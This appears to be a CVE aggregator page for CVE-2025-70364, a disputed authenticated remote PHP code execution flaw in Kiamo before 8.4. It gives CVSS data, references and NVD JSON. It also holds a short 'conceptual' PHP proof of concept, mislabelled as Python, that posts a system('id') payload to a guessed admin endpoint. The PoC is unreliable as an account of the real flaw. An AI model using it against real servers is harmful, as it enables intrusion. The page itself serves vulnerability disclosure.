CVE-2025-70364

Description

An issue was discovered in Kiamo before 8.4 allowing authenticated administrative attackers to execute arbitrary PHP code on the server. NOTE: the Supplier's position is that this is "a historical and intended administrative feature of the product, accessible only to already authenticated users explicitly granted administrator privileges." However, restrictions on some PHP functions were added in 8.4.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Kiamo < 8.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
/*
 * PoC for CVE-2025-70364: Kiamo Authenticated RCE
 * Description: Conceptual exploit demonstrating code execution.
 */

// Target URL (Hypothetical endpoint based on admin feature)
$url = "http://target-kiamo/admin/execute.php";

// Payload to execute 'id' command
$payload = "<?php system('id'); ?>";

// Simulate HTTP POST request as authenticated admin
$postData = [
    'php_code' => $payload
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
curl_setopt($ch, CURLOPT_COOKIE, "admin_session=valid_session_cookie");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
curl_close($ch);

// Output server response
echo $response;
?>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-70364
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-70364
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-70364/
[4] VulDB https://vuldb.com/cve/CVE-2025-70364
[5] http://kiamo.com
[6] https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/2025-12-23-CVE-2025-70364-Kiamo.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-70364", "sourceIdentifier": "[email protected]", "published": "2026-04-09T16:16:25.573", "lastModified": "2026-04-22T15:16:12.357", "vulnStatus": "Awaiting Analysis", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "An issue was discovered in Kiamo before 8.4 allowing authenticated administrative attackers to execute arbitrary PHP code on the server. NOTE: the Supplier's position is that this is \"a historical and intended administrative feature of the product, accessible only to already authenticated users explicitly granted administrator privileges.\" However, restrictions on some PHP functions were added in 8.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "http://kiamo.com", "source": "[email protected]"}, {"url": "https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/2025-12-23-CVE-2025-70364-Kiamo.md", "source": "[email protected]"}]}}